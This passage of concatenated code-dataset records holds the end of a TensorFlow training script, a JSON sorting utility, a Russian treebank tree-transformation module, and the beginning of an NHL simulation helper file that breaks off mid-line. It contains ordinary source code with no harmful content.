__init__(self):\n super(MyModel, self).__init__()\n self.dense1 = SimpleDense(256, activation = tf.nn.sigmoid)\n self.dense2 = SimpleDense(256, activation = tf.nn.sigmoid)\n self.out = SimpleDense(10, activation = tf.nn.softmax)\n\n def call(self, inputs):\n x = self.dense1(inputs)\n x = self.dense2(x)\n out = self.out(x)\n return out\n\n\n\n# Custom Layer\nclass SimpleDense(tf.keras.layers.Layer):\n\n def __init__(self, units, activation):\n super(SimpleDense, self).__init__()\n self.units = units\n self.activation = activation\n\n def build(self, input_shape):\n self.w = self.add_weight(shape=(input_shape[-1], self.units),\n initializer='random_normal',\n trainable=True)\n self.b = self.add_weight(shape=(self.units,),\n initializer='random_normal',\n trainable=True)\n\n def call(self, inputs):\n x = tf.matmul(inputs, self.w) + self.b\n x = self.activation(x)\n return x\n\ndef train_step(model, input, target, loss_function, optimizer):\n # loss_object and optimizer_object are instances of respective tensorflow classes\n with tf.GradientTape() as tape:\n prediction = model(input)\n loss = loss_function(target, prediction)\n gradients = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n return loss\n\ndef test(model, test_data, loss_function):\n # test over complete test data\n\n test_accuracy_aggregator = []\n test_loss_aggregator = []\n\n for (input, target) in test_data:\n prediction = model(input)\n sample_test_loss = loss_function(target, prediction)\n sample_test_accuracy = np.argmax(target, axis=1) == np.argmax(prediction, axis=1)\n sample_test_accuracy = np.mean(sample_test_accuracy)\n test_loss_aggregator.append(sample_test_loss.numpy())\n test_accuracy_aggregator.append(np.mean(sample_test_accuracy))\n\n test_loss = tf.reduce_mean(test_loss_aggregator)\n test_accuracy = tf.reduce_mean(test_accuracy_aggregator)\n\n return test_loss, test_accuracy\n\n#tf.keras.backend.clear_session()\n\n#For showcasing we only use a subset of the training and test data (generally use all of the available data!)\ntrain_dataset = train_ds\ntest_dataset = test_ds\n\n### Hyperparameters\nnum_epochs = 10\nlearning_rate = 0.1\n\n# Initialize the model.\nmodel = MyModel()\n# Initialize the loss: categorical cross entropy. Check out 'tf.keras.losses'.\ncross_entropy_loss = tf.keras.losses.CategoricalCrossentropy()\n# Initialize the optimizer: SGD with default parameters. Check out 'tf.keras.optimizers'\noptimizer = tf.keras.optimizers.SGD(learning_rate)\n\n# Initialize lists for later visualization.\ntrain_losses = []\n\ntest_losses = []\ntest_accuracies = []\n\n#testing once before we begin\ntest_loss, test_accuracy = test(model, test_dataset, cross_entropy_loss)\ntest_losses.append(test_loss)\ntest_accuracies.append(test_accuracy)\n\n#check how model performs on train data once before we begin\ntrain_loss, _ = test(model, train_dataset, cross_entropy_loss)\ntrain_losses.append(train_loss)\n\n# We train for num_epochs epochs.\nfor epoch in range(num_epochs):\n print(f'Epoch: {str(epoch)} starting with accuracy {test_accuracies[-1]}')\n\n #training (and checking in with training)\n epoch_loss_agg = []\n for input,target in train_dataset:\n train_loss = train_step(model, input, target, cross_entropy_loss, optimizer)\n epoch_loss_agg.append(train_loss)\n\n #track training loss\n train_losses.append(tf.reduce_mean(epoch_loss_agg))\n\n #testing, so we can track accuracy and test loss\n test_loss, test_accuracy = test(model, test_dataset, cross_entropy_loss)\n test_losses.append(test_loss)\n test_accuracies.append(test_accuracy)\n\nimport matplotlib.pyplot as plt\n\n# Visualize accuracy and loss for training and test data.\nplt.figure()\nline1, = plt.plot(train_losses)\nline2, = plt.plot(test_losses)\nline3, = plt.plot(test_accuracies)\nplt.xlabel(\"Training steps\")\nplt.ylabel(\"Loss/Accuracy\")\nplt.legend((line1,line2, line3),(\"training\",\"test\", \"test accuracy\"))\nplt.show()\n","repo_name":"tjayada/iANNwTF","sub_path":"hw_03-Genome.py","file_name":"hw_03-Genome.py","file_ext":"py","file_size_in_byte":5633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12617085642","text":"import json\n\n\ndef load_json(addr):\n with open(addr, \"r\") as load_f:\n load_data = json.load(load_f)\n return load_data\n\n\ndef sort_dict(a_dict, option=\"value\"):\n if option in [\"value\", \"key\"]:\n result_dict = {}\n if option == \"key\":\n temp_list = list(a_dict.keys())\n temp_list.sort()\n for item in temp_list:\n result_dict[item] = a_dict[item]\n else:\n temp_value_list = list(a_dict.values())\n temp_key_list = list(a_dict.keys())\n for i in range(len(temp_key_list)):\n for j in range(len(temp_key_list) - i - 1):\n if temp_value_list[j] > temp_value_list[j + 1]:\n temp = temp_key_list[j]\n temp_key_list[j] = temp_key_list[j + 1]\n temp_key_list[j + 1] = temp\n temp = temp_value_list[j]\n temp_value_list[j] = temp_value_list[j + 1]\n temp_value_list[j + 1] = temp\n for key, value in zip(temp_key_list, temp_value_list):\n result_dict[key] = value\n return result_dict\n raise ValueError(option + \" is not in option list——[key,value]\")\n\n\ndef get_repeat_size(addr):\n dict_all_new = load_json(addr)\n dict_repeat_size = {}\n\n final_dict = {}\n for dict_name in dict_all_new:\n if len(dict_all_new[dict_name]) == 1:\n continue\n tmp_img = []\n tmp_size = 0\n for img in dict_all_new[dict_name]:\n tmp_size = img[\"size\"]\n if img[\"img\"] not in tmp_img:\n tmp_img.append(img[\"img\"])\n if tmp_size == 0 or len(tmp_img) == 1:\n continue\n tmp_img.sort()\n name = \"\"\n for name_tmp in tmp_img:\n name = name + name_tmp + \"_\"\n if name_tmp not in dict_repeat_size:\n dict_repeat_size[name_tmp] = tmp_size\n else:\n dict_repeat_size[name_tmp] = dict_repeat_size[name_tmp] + tmp_size\n if name not in final_dict:\n final_dict[name] = tmp_size\n else:\n final_dict[name] = final_dict[name] + tmp_size\n if len(dict_all_new[dict_name]) > 3:\n print(final_dict[name], dict_all_new[dict_name])\n dict_order = sort_dict(final_dict)\n for i in dict_order:\n print(\"repeat\", i, dict_order[i])\n print(dict_repeat_size)\n return 0\n\n\nif __name__ == \"__main__\":\n addr = \"./input/DATA/all_hash_dict.txt\"\n","repo_name":"fwyc0573/PreliminaryBooster","sub_path":"booster/refactorer/util/get_repeat_size.py","file_name":"get_repeat_size.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"26211129759","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nSynTagRus Tree Transformation Module\nalexluu@brandeis.edu\n\"\"\"\n\nfrom nltk.tree import Tree, ParentedTree\nfrom copy import deepcopy\nimport re\nfrom collections import defaultdict\n\ni_pattern = re.compile(r'^\\d+$')\n\ndef analyze_label(label):\n \"\"\" -> dict of syntactic and functional tags \"\"\"\n output = dict()\n temp = label.split('-')\n output['syntactic'] = temp[0]\n output['functional'] = set(temp[1:])\n return output\n\ndef get_label_positions(t,order=\"preorder\"):\n \"\"\"\n order: \"preorder\"/\"postprder\"/\"bothorder\"/\"leaves\"\n \"\"\"\n output = t.treepositions(order)\n leaves = t.treepositions('leaves')\n for p in leaves:\n output.remove(p)\n return output\n\n############################################################\n\ndef change_label(t,f_tag,s_tag):\n \"\"\" change s_tag of all nodes having f_tag \"\"\"\n # set of positions of all labels in tree\n l_pos = get_label_positions(t)\n for p in l_pos:\n l = t[p].label()\n f_tags = analyze_label(l)['functional']\n if f_tag in f_tags:\n t[p].set_label(s_tag+''.join(l.partition('-')[1:]))\n\n############################################################\n\ndef find_first_wh_leaf(t):\n \"\"\" -> 1st WH leaf in a WH phrase t \"\"\"\n leaves = t.treepositions('leaves')\n for i in range(len(leaves)):\n f_tags = analyze_label(t[leaves[i][:-1]].label())\\\n ['functional']\n if 'WH' in f_tags:\n return i\n\ndef find_highest_unary(t,p): #p: treeposition\n \"\"\" -> highest unary node dominating p \"\"\"\n output = p\n if len(p): # p!=tuple()\n for i in range(len(p)):\n if len(t[p[:-(i+1)]])>1:\n break\n if i>0:\n output = p[:-i]\n return output \n\ndef find_wh_phrase(t):\n wh_index = find_first_wh_leaf(t)\n if isinstance(wh_index,int):\n if wh_index==0: # handle trees[1331]\n wh_pos = t.leaf_treeposition(0)[:-2]\n else:\n wh_pos = t.treeposition_spanning_leaves(0,wh_index+1)\n return find_highest_unary(t,wh_pos)\n return \"No WH leaf!\"\n \n\ndef wh_movement(t,pos):\n cpos = find_wh_phrase(t[pos])\n if cpos==\"No WH leaf!\":\n pass\n elif not cpos:\n pass\n else: \n ctemp = deepcopy(t[pos][cpos])\n clabel = analyze_label(ctemp.label())\n fs = clabel['functional']\n if all(not i_pattern.match(f) for f in fs):\n index = '-' + ''.join(str(i) for i in pos) + \\\n '1' + ''.join(str(i) for i in cpos)\n label = clabel['syntactic'] + index\n t[pos][cpos] = Tree(t[pos][cpos].label(),\n ['*T*'+index])\n else:\n label = ctemp.label()\n del t[pos][cpos]\n ctemp.set_label('WH' + label)\n temp = deepcopy(t[pos])\n label = temp.label().partition('-')\n t[pos] = Tree('SBAR'+label[1]+label[2],[\n ctemp,\n temp\n ])\n\n############################################################\n\ndef get_relative_nodes(t,order='postorder'):\n output = list()\n nodes = get_label_positions(t,order)\n for n in nodes:\n f_tags = analyze_label(t[n].label())['functional']\n if 'RLT' in f_tags or 'SBO' in f_tags:\n output.append(n)\n return output\n\ndef get_relative_structures(t,order='postorder'):\n \"\"\" Ignore null elements \"\"\"\n output = list()\n nodes = get_label_positions(t,order)\n for n in nodes:\n if t[n].height()>2: # t contains more than just leaves\n f_tags = analyze_label(t[n].label())['functional']\n if 'RLT' in f_tags or 'SBO' in f_tags:\n output.append(n)\n return output\n\ndef transform_relative_structures(t):\n rlt_structures = get_relative_structures(t)\n for n in rlt_structures:\n wh_movement(t,n)\n\n############################################################\n\ndef c_command(node1, node2): #node1, node2: tree positions\n return (node1[:-1]==node2[:len(node1[:-1])]\n and node1[-1]!=node2[len(node1[:-1])])\n\ndef merge_nodes(t,parent): #parent: tree position\n p_label =t[parent].label().partition('-') \n if len(p_label)==3:\n for c in t[parent]:\n if isinstance(c,Tree):\n if p_label[0].startswith(analyze_label\\\n (c.label())['syntactic']):\n c.set_label(c.label()+'-'+p_label[2])\n new_index = parent[-1]+len(t[parent])\n for c in t[parent][::-1]:\n t[parent[:-1]].insert(parent[-1],c)\t\n del t[parent[:-1]][new_index] \n\n############################################################\n\ndef np2p_leaves(tree):\n return set([p for p in tree.treepositions('leaves')\n if tree[p].startswith('*NP2P*')])\n\ndef np2p_coindexed_node(tree,leaf): #leaf: tree position\n coindex = tree[leaf].partition('-')[2]\n for p in get_label_positions(tree):\n if coindex in analyze_label(tree[p].label())\\\n ['functional']:\n return p\n\ndef np2p_root(node,leaf): #node, leaf: tree positions\n for i in range(len(node)):\n if i==len(leaf) or node[i]!=leaf[i]:\n break\n return node[:i]\n\ndef get_np2p_roots(t,order='postorder'): # only problematic ones\n np2p_roots = defaultdict(list)\n for l in np2p_leaves(t):\n n = np2p_coindexed_node(t,l)\n if not c_command(n,l):\n np2p_roots[np2p_root(n,l)].append((t[n].label(),\n t[l]))\n nodes = get_label_positions(t,order)\n return [n for n in nodes if n in np2p_roots],np2p_roots\n\ndef order_labels(tree,labels,order='preorder'): #labels: list of labels of coindexed nodes\n np2p_coindexed_nodes = dict()\n for p in get_label_positions(tree):\n if tree[p].label() in labels:\n np2p_coindexed_nodes[p] = tree[p].label() \n nodes = get_label_positions(tree,order)\n ordered = [n for n in nodes if n in np2p_coindexed_nodes]\n return [np2p_coindexed_nodes[p] for p in ordered]\n\n\ndef transform_np2p_structures(t): #to satisfy c-command condition\n ordered, targets = get_np2p_roots(t)\n for p in ordered:\n tree = t[p]\n labels = [x[0] for x in targets[p]]\n ordered_labels = order_labels(tree,labels)\n for l in labels:\n for pp in get_label_positions(tree):\n if tree[pp].label()==l:\n break\n for i in range(len(pp)-1):\n merge_nodes(tree,pp[:-(i+1)])\n\n############################################################\n\ndef transform_coordinative_structures(tree):\n flag = False\n nodes = get_label_positions(tree,order='postorder')\n for n in nodes[:-1]:\n s_tag = analyze_label(tree[n].label())['syntactic']\n f_tags = analyze_label(tree[n].label())['functional']\n pf_tags = set()\n if len(n): #if n has parent\n ps_tag = analyze_label(tree[n[:-1]].label())\\\n ['syntactic']\n pf_tags = analyze_label(tree[n[:-1]].label())\\\n ['functional']\n if ('CRC' in f_tags)or \\\n (('CRD' in f_tags) and ('CRD' in pf_tags) and\n s_tag == ps_tag) or \\\n (('SCR' in f_tags) and ('SCR' in pf_tags) and\n s_tag == ps_tag):\n merge_nodes(tree,n)\n flag = True\n break\n if flag:\n transform_coordinative_structures(tree)\n return flag\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"luutuntin/SynTagRus_DS2PS","sub_path":"syntagrus_transformation.py","file_name":"syntagrus_transformation.py","file_ext":"py","file_size_in_byte":7516,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6399086139","text":"import datetime\nimport time\nimport itertools\nimport os\nimport numpy as np\nimport platform\nimport math\nimport inspect\nimport csv\nimport copy\nimport random\nimport copy\nimport warnings\nimport json\nimport gspread\nimport cfscrape\nimport signal\nimport scipy.stats as st\nfrom oauth2client.client import SignedJwtAssertionCredentials\nfrom collections import defaultdict\nfrom nhl_defines import *\nfrom shutil import copyfile\nfrom inspect import currentframe, getframeinfo\n\nif platform.system() == 'Darwin':\n\timport matplotlib\n\timport matplotlib.pyplot as plt\n\ndef generate_long_name():\n\tlong_name = {}\n\tlong_name['ANA'] = 'Anaheim Ducks'\n\tlong_name['ARI'] = 'Arizona Coyotes'\n\tlong_name['BOS'] = 'Boston Bruins'\n\tlong_name['BUF'] = 'Buffalo Sabres'\n\tlong_name['CAR'] = 'Carolina Hurricanes'\n\tlong_name['CBJ'] = 'Columbus Blue Jackets'\n\tlong_name['CGY'] = 'Calgary Flames'\n\tlong_name['CHI'] = 'Chicago Blackhawks'\n\tlong_name['COL'] = 'Colorado Avalanche'\n\tlong_name['DAL'] = 'Dallas Stars'\n\tlong_name['DET'] = 'Detroit Red Wings'\n\tlong_name['EDM'] = 'Edmonton Oilers'\n\tlong_name['FLA'] = 'Florida Panthers'\n\tlong_name['LAK'] = 'Los Angeles Kings'\n\tlong_name['MIN'] = 'Minnesota Wild'\n\tlong_name['MTL'] = 'Montreal Canadiens'\n\tlong_name['NJD'] = 'New Jersey Devils'\n\tlong_name['NSH'] = 'Nashville Predators'\n\tlong_name['NYI'] = 'New York Islanders'\n\tlong_name['NYR'] = 'New York Rangers'\n\tlong_name['OTT'] = 'Ottawa Senators'\n\tlong_name['PHI'] = 'Philadelphia Flyers'\n\tlong_name['PIT'] = 'Pittsburgh Penguins'\n\tlong_name['SJS'] = 'San Jose Sharks'\n\tlong_name['STL'] = 'St. Louis Blues'\n\tlong_name['TBL'] = 'Tampa Bay Lightning'\n\tlong_name['TOR'] = 'Toronto Maple Leafs'\n\tlong_name['VAN'] = 'Vancouver Canucks'\n\tlong_name['VGK'] = 'Vegas Golden Knights'\n\tlong_name['WPG'] = 'Winnipeg Jets'\n\tlong_name['WSH'] = 'Washington Capitals'\n\treturn long_name\n\ndef generate_all_teams_dict(return_type):\n\toutput = {}\n\toutput['ANA'] = return_type\n\toutput['ARI'] = return_type\n\toutput['BOS'] = return_type\n\toutput['BUF'] = return_type\n\toutput['CAR'] = return_type\n\toutput['CBJ'] = return_type\n\toutput['CGY'] = return_type\n\toutput['CHI'] = return_type\n\toutput['COL'] = return_type\n\toutput['DAL'] = return_type\n\toutput['DET'] = return_type\n\toutput['EDM'] = return_type\n\toutput['FLA'] = return_type\n\toutput['LAK'] = return_type\n\toutput['MIN'] = return_type\n\toutput['MTL'] = return_type\n\toutput['NJD'] = return_type\n\toutput['NSH'] = return_type\n\toutput['NYI'] = return_type\n\toutput['NYR'] = return_type\n\toutput['OTT'] = return_type\n\toutput['PHI'] = return_type\n\toutput['PIT'] = return_type\n\toutput['SJS'] = return_type\n\toutput['STL'] = return_type\n\toutput['TBL'] = return_type\n\toutput['TOR'] = return_type\n\toutput['VAN'] = return_type\n\toutput['VGK'] = return_type\n\toutput['WPG'] = return_type\n\toutput['WSH'] = return_type\n\treturn output\n\ndef get_daily_fo_url(team_id):\n\tdaily_fo_url_dict = {}\n\tdaily_fo_url_dict['ANA'] = \"https://www.dailyfaceoff.com/teams/anaheim-ducks/line-combinations/\"\n\tdaily_fo_url_dict['ARI'] = \"https://www.dailyfaceoff.com/teams/arizona-coyotes/line-combinations/\"\n\tdaily_fo_url_dict['BOS'] = \"https://www.dailyfaceoff.com/teams/boston-bruins/line-combinations/\"\t\n\tdaily_fo_url_dict['BUF'] = \"https://www.dailyfaceoff.com/teams/buffalo-sabres/line-combinations/\"\n\tdaily_fo_url_dict['CAR'] = \"https://www.dailyfaceoff.com/teams/carolina-hurricanes/line-combinations/\"\n\tdaily_fo_url_dict['CBJ'] = \"https://www.dailyfaceoff.com/teams/columbus-blue-jackets/line-combinations/\"\n\tdaily_fo_url_dict['CGY'] = \"https://www.dailyfaceoff.com/teams/calgary-flames/line-combinations/\"\n\tdaily_fo_url_dict['CHI'] = \"https://www.dailyfaceoff.com/teams/chigaco-blackhawks/line-combinations/\"\n\tdaily_fo_url_dict['COL'] = \"https://www.dailyfaceoff.com/teams/colorado-avalanche/line-combinations/\"\n\tdaily_fo_url_dict['DAL'] = \"https://www.dailyfaceoff.com/teams/dallas-stars/line-combinations/\"\n\tdaily_fo_url_dict['DET'] = \"https://www.dailyfaceoff.com/teams/detroit-red-wings/line-combinations/\"\n\tdaily_fo_url_dict['EDM'] = \"https://www.dailyfaceoff.com/teams/edmonton-oilers/line-combinations/\"\n\tdaily_fo_url_dict['FLA'] = \"https://www.dailyfaceoff.com/teams/florida-panthers/line-combinations/\"\n\tdaily_fo_url_dict['LAK'] = \"https://www.dailyfaceoff.com/teams/los-angeles-kings/line-combinations/\"\n\tdaily_fo_url_dict['MIN'] = \"https://www.dailyfaceoff.com/teams/minnesota-wild/line-combinations/\"\n\tdaily_fo_url_dict['MTL'] = \"https://www.dailyfaceoff.com/teams/montreal-canadiens/line-combinations/\"\n\tdaily_fo_url_dict['NJD'] = \"https://www.dailyfaceoff.com/teams/new-jersey-devils/line-combinations/\"\n\tdaily_fo_url_dict['NSH'] = \"https://www.dailyfaceoff.com/teams/nashville-predators/line-combinations/\"\n\tdaily_fo_url_dict['NYI'] = \"https://www.dailyfaceoff.com/teams/new-york-islanders/line-combinations/\"\n\tdaily_fo_url_dict['NYR'] = \"https://www.dailyfaceoff.com/teams/new-york-rangers/line-combinations/\"\n\tdaily_fo_url_dict['OTT'] = \"https://www.dailyfaceoff.com/teams/ottawa-senators/line-combinations/\"\n\tdaily_fo_url_dict['PHI'] = \"https://www.dailyfaceoff.com/teams/philadelphia-flyers/line-combinations/\"\n\tdaily_fo_url_dict['PIT'] = \"https://www.dailyfaceoff.com/teams/pittsburgh-penguins/line-combinations/\"\n\tdaily_fo_url_dict['SJS'] = \"https://www.dailyfaceoff.com/teams/san-jose-sharks/line-combinations/\"\n\tdaily_fo_url_dict['STL'] = \"https://www.dailyfaceoff.com/teams/st-louis-blues/line-combinations/\"\n\tdaily_fo_url_dict['TBL'] = \"https://www.dailyfaceoff.com/teams/tampa-bay-lightning/line-combinations/\"\n\tdaily_fo_url_dict['TOR'] = \"https://www.dailyfaceoff.com/teams/toronto-maple-leafs/line-combinations/\"\n\tdaily_fo_url_dict['VAN'] = \"https://www.dailyfaceoff.com/teams/vancouver-canucks/line-combinations/\"\n\tdaily_fo_url_dict['VGK'] = \"https://www.dailyfaceoff.com/teams/vegas-golden-knights/line-combinations/\"\n\tdaily_fo_url_dict['WPG'] = \"https://www.dailyfaceoff.com/teams/winnipeg-jets/line-combinations/\"\n\tdaily_fo_url_dict['WSH'] = \"https://www.dailyfaceoff.com/teams/washington-capitals/line-combinations/\"\n\treturn daily_fo_url_dict[team_id]\n\ndef get_home_team_advantage(t_db,ht_id,at_id=None):\n\tht = t_db[ht_id]\n\tht_rel_pcg = ht.home_p_pcg/(ht.home_p_pcg+ht.away_p_pcg)\n\tif at_id == None:\t\n\t\treturn ht_rel_pcg\n\telse:\n\t\tat = t_db[at_id]\n\t\tat_rel_pcg = at.home_p_pcg/(at.home_p_pcg+at.away_p_pcg)\n\t\treturn ht_rel_pcg/(1-at_rel_pcg)\n\ndef get_days_rested(team_id,simulation_param):\n\t# For now, only takes the most recent rest into account.\n\tmaximum_rest = 3 # number of days after the team is fully healthy/rested.\n\ti = 0\n\tfound = False\n\tdays_rested = maximum_rest\n\twhile i < maximum_rest and found == False:\n\t\tgames_on_date = simulation_param['databases']['season_schedule'][get_previous_day(simulation_param['simulation_date'],i+1)] # i+1 since there is not need to check the same day as the game.\n\t\tfor game in games_on_date:\n\t\t\tif team_id in game:\n\t\t\t\tdays_rested = i\n\t\t\t\tfound = True\n\t\ti += 1\n\treturn days_rested\n\ndef is_skipp_year(year):\n\tif ((year%4) == 0) and ((year%400) == 0):\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef get_previous_day(start_date,number_of_days):\n\t# This is very ugly and should be done by using datetime.dateime libraray instead.\n\t# Date needs to be in str-format: 'YYYY-MM-DD'\n\tif number_of_days == 0:\n\t\treturn start_date\n\telse:\n\t\tdatestr = start_date\n\t\ti = 0\n\t\twhile i < number_of_days:\n\t\t\t[year,month,day] = datestr.split('-')\n\t\t\tif int(day) > 1:\n\t\t\t\tday = int(day)-1\n\t\t\telse:\n\t\t\t\tif int(month) in [2,4,6,8,9,11]:\n\t\t\t\t\tmonth = int(month)-1\n\t\t\t\t\tday = 31\n\t\t\t\telif int(month) in [5,7,10,12]:\n\t\t\t\t\tmonth = int(month)-1\n\t\t\t\t\tday = 30\n\t\t\t\telif int(month) == 3:\n\t\t\t\t\tmonth = int(month)-1\n\t\t\t\t\tif is_skipp_year:\n\t\t\t\t\t\tday = 29\n\t\t\t\t\telse:\n\t\t\t\t\t\tday = 28\n\t\t\t\telse:\n\t\t\t\t\tyear = int(year)-1\n\t\t\t\t\tmonth = 12\n\t\t\t\t\tday = 31\n\t\t\tdatestr = str(str(year) + '-' + str(month) + '-' + str(day))\n\t\t\ti += 1\n\t\treturn datestr\n\ndef get_delta_days(date0,date1):\n\t# Assumes 'YYYY-MM-DD'\n\t[year0,month0,day0] = date0.split('-')\n\t[year1,month1,day1] = date1.split('-')\n\n\td0 = datetime.date(int(year0),int(month0),int(day0))\n\td1 = datetime.date(int(year1),int(month1),int(day1))\n\n\tdelta = d1-d0\n\treturn delta.days\n\ndef get_long_name(team_id):\n\ttmp = generate_long_name()\n\treturn tmp[team_id]\n\ndef get_team_id(long_name):\n\ttmp = generate_long_name()\n\tfor team_id in tmp:\n\t\tif tmp[team_id] == long_name:\n\t\t\treturn team_id\n\ndef get_team(team_db,team_id):\n\treturn team_db[team_id]\n\ndef get_player(simulation_param,player_id):\n\tif player_id in ACTIVE_GOALIES:\n\t\treturn get_goalie(simulation_param['databases']['goalie_db'],player_id)\n\telif player_id in ACTIVE_SKATERS:\n\t\treturn get_skater(simulation_param['databases']['skater_db'],player_id)\n\telse:\n\t\traise ValueError(player_id + ' not included in Goalie or Skater databse.')\n\ndef get_skater(skater_db,player_id):\n\treturn skater_db[player_id]\n\ndef get_goalie(goalie_db,player_id):\n\treturn goalie_db[player_id]\n\ndef print_progress(i,N,t0,step=10):\n\ttime_unit = ['min','min']\n\tprinted = False\n\tif ((i%(N/(100/step))) == 0) and (i>0):\n\t\tt_elp = (time.time() - t0)/60\n\t\tt_left = t_elp*((N/i) - 1)\n\t\tif t_elp < 1.0:\n\t\t\tt_elp *= 60\n\t\t\ttime_unit[0] = 'sec'\n\t\tif t_left < 1.0:\n\t\t\tt_left *= 60\n\t\t\ttime_unit[1] = 'sec'\n\t\tn = datetime.datetime.now()\n\t\tprint_n = str(datetime.time(n.hour,n.minute,n.second))\n\t\tif time_unit[1] == 'sec':\n\t\t\teta = n+datetime.timedelta(seconds=t_left)\n\t\telse:\n\t\t\teta = n+datetime.timedelta(minutes=t_left)\n\t\tprint_eta = str(datetime.time(eta.hour,eta.minute,eta.second))\n\t\tprint('{0}: {1:.0f} % completed. Time elapsed: {2:.0f} {3}. Estimated time left: {4:.0f} {5} (ETA: {6}).'.format(print_n,100*i/N,t_elp,time_unit[0],t_left,time_unit[1],print_eta))\n\t\tprinted = True\n\treturn printed\n\ndef val_in_list(val,lst):\n\t''' Returns the number of times the value val appears in the list lst. '''\n\to = 0\n\tfor vl in lst:\n\t\tif vl == val: \n\t\t\to += 1\n\treturn o\n\ndef get_list_pcg(lst):\n\tnew_lst = []\n\tfor i in range(len(lst)):\n\t\tnew_lst.append(100*lst[i]/sum(lst))\n\treturn new_lst\n\ndef get_time_str_from_sec(seconds):\n\tm = seconds//60\n\ts = seconds%60\n\tif m < 10:\n\t\tm = str('0'+str(m))\n\telse:\n\t\tm = str(m)\n\n\tif s < 10:\n\t\ts = str('0'+str(s))\n\telse:\n\t\ts = str(s)\n\t\n\treturn str(m + ':' + s)\n\ndef get_position_for_player(position):\n\tif (position == 'L') or (position == 'C') or (position == 'R'):\n\t\tposition = 'F'\n\treturn position\n\ndef generate_player_id(raw_str,team_id):\n\tplayer_id = str(raw_str).upper().replace(' ','_')\n\tplayer_id = player_id.replace('.','_')\n\tplayer_id = player_id.replace(\"'\",'')\n\n\t# Handle special cases\n\tif player_id == 'ALEXANDER_NYLANDER':\n\t\tplayer_id = 'ALEX_NYLANDER'\n\n\tif (player_id == 'SEBASTIAN_AHO') and (team_id != 'CAR'):\n\t\tplayer_id = 'SEBASTIAN_AHO2'\n\n\treturn player_id\n\ndef is_this_aho(raw_player_str,raw_team_str):\n\tplayer_id = str(raw_player_str).upper().replace(' ','_')\n\tplayer_id = player_id.replace('.','_')\n\tplayer_id = player_id.replace(\"'\",'')\n\tif player_id == 'SEBASTIAN_AHO':\n\t\tbool_a = True\n\t\tif raw_team_str == 'CAR':\n\t\t\tplayer_id = 'SEBASTIAN_AHO'\n\t\telse:\n\t\t\tplayer_id = 'SEBASTIAN_AHO2'\n\telse:\n\t\tbool_a = False\n\t\tplayer_id = 'N/A'\n\treturn [bool_a,player_id]\n\ndef generate_player_and_team_id(raw_player_str,raw_team_str=None,is_relative=False):\n\tplayer_id = str(raw_player_str).upper().replace(' ','_')\n\tplayer_id = player_id.replace('.','_')\n\tplayer_id = player_id.replace(\"'\",'')\n\n\t#@TODO: This should REALLY not be raw_team_str!\n\tif (player_id == 'SEBASTIAN_AHO') and (raw_team_str != 'CAR'):\n\t\tplayer_id = 'SEBASTIAN_AHO2'\n\t\treturn [player_id, 'NYI']\n\n\t# Handle special cases\n\tif player_id == 'ALEXANDER_NYLANDER':\n\t\tplayer_id = 'ALEX_NYLANDER'\n\t\n\tif raw_team_str == None:\n\t\tteam_id = 'MAKE_BELIEVES'\n\telse:\n\t\t# Get team-id\n\t\tmanually_checked_players = set()\n\t\tmanually_checked_players.add('MARCO_SCANDELLA')\n\t\tmanually_checked_players.add('ILYA_KOVALCHUK')\n\t\tmanually_checked_players.add('VLADISLAV_NAMESTNIKOV')\n\t\tnew_team = {}\n\t\t#new_team['VLADISLAV_NAMESTNIKOV'] = 'OTT'\n\t\tnew_team['ERIK_GUDBRANSON'] = 'ANA'\n\t\tnew_team['ANDREAS_MARTINSEN'] = 'PTI'\n\t\tnew_team['BRENDAN_PERLINI'] = 'DET'\n\t\tnew_team['JACOB_DE_LA_ROSE'] = 'STL'\n\t\tnew_team['ROBBY_FABBRI'] = 'DET'\n\t\tnew_team['CHANDLER_STEPHENSON'] = 'VGK'\n\t\tnew_team['NICK_SHORE'] = 'WPG'\n\t\tnew_team['TAYLOR_HALL'] = 'ARI'\n\t\tnew_team['STEFAN_NOESEN'] = 'SJS'\n\t\tnew_team['MARCO_SCANDELLA'] = 'STL'\n\t\tnew_team['MIKE_REILLY'] = 'OTT'\n\t\t#new_team['ILYA_KOVALCHUK'] = 'MTL'\n\t\tnew_team['MICHAEL_FROLIK'] = 'BUF'\n\t\tnew_team['JACK_CAMPBELL'] = 'TOR'\n\t\tnew_team['KYLE_CLIFFORD'] = 'TOR'\n\t\tnew_team['TREVOR_MOORE'] = 'LAK'\n\t\tnew_team['NICK_SEELER'] = 'CHI'\n\t\tnew_team['JASON_ZUCKER'] = 'PIT'\n\t\tnew_team['ALEX_GALCHENYUK'] = 'MIN'\n\t\tnew_team['ANDY_GREENE'] = 'NYI'\n\t\tnew_team['BRENDEN_DILLON'] = 'WSH'\n\t\tnew_team['TYLER_TOFFOLI'] = 'VAN'\n\t\tnew_team['JULIEN_GAUTHIER'] = 'NYR'\n\t\tnew_team['BLAKE_COLEMAN'] = 'TBL'\n\t\tnew_team['ALEC_MARTINEZ'] = 'VGK'\n\t\tnew_team['DYLAN_DEMELO'] = 'WPG'\n\t\tnew_team['TIM_SCHALLER'] = 'LAK'\n\t\tnew_team['JAYCE_HAWRYLUK'] = 'OTT'\n\t\tnew_team['DENIS_MALGIN'] = 'TOR'\n\t\tnew_team['CODY_EAKIN'] = 'WPG'\n\t\tnew_team['DANTON_HEINEN'] = 'ANA'\n\t\tnew_team['NICK_RITCHIE'] = 'BOS'\n\t\tnew_team['DEREK_GRANT'] = 'PHI'\n\t\t#new_team['PATRICK_MARLEAU'] = 'PIT'\n\t\tnew_team['WAYNE_SIMMONDS'] = 'BUF'\n\t\tnew_team['NATE_THOMPSON'] = 'PHI'\n\t\tnew_team['VINCENT_TROCHECK'] = 'CAR'\n\t\tnew_team['ERIK_HAULA'] = 'FLA'\n\t\tnew_team['LUCAS_WALLMARK'] = 'FLA'\n\t\tnew_team['JEAN-GABRIEL_PAGEAU'] = 'NYI'\n\t\tnew_team['VLADISLAV_NAMESTNIKOV'] = 'COL'\n\t\tnew_team['ILYA_KOVALCHUK'] = 